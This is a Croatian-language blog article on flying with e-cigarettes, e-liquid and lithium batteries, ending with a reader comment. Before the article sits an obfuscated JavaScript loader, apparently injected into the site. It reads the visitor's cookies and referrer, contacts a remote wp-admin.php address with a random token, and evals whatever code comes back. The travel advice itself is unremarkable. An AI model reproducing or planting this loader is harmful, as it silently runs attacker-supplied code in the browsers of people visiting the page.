;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Vape i putovanje avionom

Ukoliko ste vaper, zasigurno ćete htjeti ponijeti svoju omiljenu e-cigaretu i e-tekućinu na put gdje god išli. Međutim, kako zakoni o vape opremi diljem svijeta postaju stroži, postoje neka razmatranja koja trebate uzeti u obzir prije nego spakirate svoju opremu za nadolazeće putovanje.

Koja su pravila za letenje s e-cigaretom?

Poznavanje pravila za putovanje s vape opremom može vam pomoći da izbjegnete čitav niz problema. Mogu postojati stroga pravila o putovanju s vašom parilicom, od veličine baterija koje možete spakirati, do čak mjesta i načina na koji pakirate svoj uređaj. Uvijek je dobra ideja izravno se posavjetovati sa zrakoplovnom tvrtkom s kojom ste odabrali let kako biste bili sigurni da ispunjavate sve njihove zahtjeve.

Ta se pravila mogu razlikovati ovisno od aviokompanije, ali opće pravilo je da uređaj mora biti u vašoj ručnoj prtljazi. U suprotnom, vaša će e-cigareta najvjerojatnije biti zaplijenjena ukoliko je pronađu u predanoj prtljazi.

Razlog zašto vape oprema nije dopuštena u predanoj prtljazi je povećana vjerojatnost da će litijeve baterije eksplodirati ili se zapaliti u teretnom prostoru kao rezultat smanjenog tlaka zraka.

Možete li ponijeti e-tekućinu u avion?

Da, e-tekućina je dopuštena u avionu, a možete je spakirati i u predanu i u ručnu prtljagu. Ipak, još uvijek postoje propisi o e-tekućinama koje morate znati kada pakirate svoju opremu.

Kao i sa svim tekućinama, zrakoplovne tvrtke provode stroga pravila o količinama vape soka s kojima možete putovati. Neka vaše tekućine budu u bočicama koje nisu veće 100 ml. Ukupno možete ponijeti 1 litru tekućine ili 950 ml za ručnu prtljagu. Međutim, to računa za sve tekućine, uključujući stvari poput krema, parfema i tako dalje.

Preporučamo da vašu e-tekućinu zajedno s e-cigaretom spakirate u ručnu prtljagu kako bi izbjegni eventualno prolijevanje zbog promjena u tlaku zraka.

Savjeti za pakiranje vape opreme

Evo nekih od najboljih savjeta za putovanje sa svojim zalihama za vape:

 • Pakirajte se lagano – najbolje je ostaviti svoje komplete zavojnica i nepotrebne predmete kod kuće jer se mogu izgubiti ili uzrokovati nepotrebne komplikacije sa sigurnošću
 • Odlučite se za jednokratni ili pod sustav – za poznavatelje vapea ovo bi vam moglo biti manje ugodno iskustvo, ali će vam uštedjeti neke od briga na kratkom putovanju.
 • Stavite baterije u ručnu prtljagu
 • Osigurajte da se vaš uređaj ne može slučajno aktivirati
 • Ostavite svoje THC i CBD tekućine kod kuće – putovanje s THC-om, pa čak i CBD-om može biti rizično ili čak protuzakonito
 • Izbjegavajte pakirati neotvorene ili jako prepunjene bočice vape soka – mogu se proširiti i curiti ili puknuti zbog pritiska u kabini
 • Dajte prednost svom vape soku – kupite stvari poput dezodoransa, paste za zube i drugih toaletnih potrepština na odredištu. To će vam omogućiti da spakirate više e-tekućine ukoliko smatrate da vam je to potrebno

Kako putovati s baterijama

Baterije su posebna stavka o kojoj morate razmišljati kada pakirate svoje e-cigarete.

 • Najvažnije pravilo od svih njih – spakirajte sve baterije u svoju ručnu prtljagu
 • Znajte svoja ograničenja veličine – 2 grama litija po bateriji za nepunjive baterije i manje od 100 Wh po bateriji za punjive baterije
 • Ponesite samo dovoljno baterija za sebe. Inače bi vas vlasti mogle ispitivati ​​o distribuciji ili prodaji
 • Ostavite baterije u njihovoj ambalaži ili stavite traku preko krajnjih priključaka
 • Nikada nemojte putovati s oštećenim baterijama

Možete li pariti u avionu?

Ne, ne možete pariti u avionu. Ne postoji nikakva zrakoplovna tvrtka koja dopušta upotrebu vapea i e-cigareta. Zapravo, možete biti podvrgnuti pozamašnim kaznama za vaping u avionu, u rasponu od 2 do 4000 dolara.

I za svaki slučaj treba reći: ne pokušavajte nadmudriti sigurnosne sustave. Neovlašteno diranje u detektore dima u zahodima u avionu, što je savezni prekršaj, donijet će vam dodatne novčane kazne do 2000 dolara.

To znači da biste se mogli suočiti s kaznom od 6000 dolara za vaping. Omjer rizika i dobiti definitivno nije vrijedan toga.

Možete li pariti u zračnoj luci?

Odgovor je i da i ne. Neke zračne luke dopuštaju korištenje e-cigarete, ali mnoge ne. Preporuča se unaprijed provjeriti u određenoj zračnoj luci ili pripaziti na znakove oko terminala. Vrlo je vjerojatno da vam neće biti dopušteno pariti unutar zračne luke. U tom će slučaju neke zračne luke imati određena područja za pušenje koja su u skladu s lokalnim zakonima. Ta su područja obično pogodna za vape.

Choose your Reaction!
 • Super koristan članak i jedna od čestih tema na raznim vape grupama i forumima. Ovdje je sve na jednom mjestu, ali “vape sok” – pobogu Simona :D

Leave a Comment